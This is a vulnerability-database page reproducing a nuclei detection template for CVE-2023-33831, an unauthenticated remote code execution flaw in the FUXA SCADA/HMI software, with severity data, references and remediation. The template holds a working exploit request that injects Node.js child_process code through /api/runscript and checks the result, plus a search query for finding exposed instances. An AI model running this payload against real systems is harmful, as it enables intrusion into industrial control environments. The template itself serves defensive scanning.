Lucene search
K

FUXA - Unauthenticated Remote Code Execution

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 92 Views

FUXA - Unauthenticated Remote Code Execution vulnerability allows attackers to execute arbitrary commands via crafted POST reques

Related
Refs
Code
id: CVE-2023-33831

info:
  name: FUXA - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: |
    A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
  impact: |
    Unauthenticated attackers can execute arbitrary Node.js code through the runscript API endpoint, potentially compromising the entire SCADA/HMI system and accessing industrial control data.
  remediation: |
    Update FUXA to a version newer than 1.1.13 that validates script code and requires authentication for the runscript endpoint.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33831
    - https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831
    - https://github.com/codeb0ss/CVE-2023-33831-PoC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-33831
    cwe-id: CWE-77
    epss-score: 0.13746
    epss-percentile: 0.96055
    cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: frangoteam
    product: fuxa
    fofa-query:
      - title="FUXA"
      - title="fuxa"
  tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth,vkev,vuln
variables:
  filename: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /api/runscript HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')"}}}
      - |
        GET /_images/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'Script OK:'

      - type: word
        part: body_2
        words:
          - 'uid'
          - 'gid'
          - 'groups'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cdcf24113009b8e6bb866a7eda27bbfb994ff9c7ded266705d9cf3fad5f7f61602204018e24c782caa71a4a1990f7f331efc4023d5f047ddd95bb1755bdaa00b00a4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.8
EPSS0.13746
SSVC
92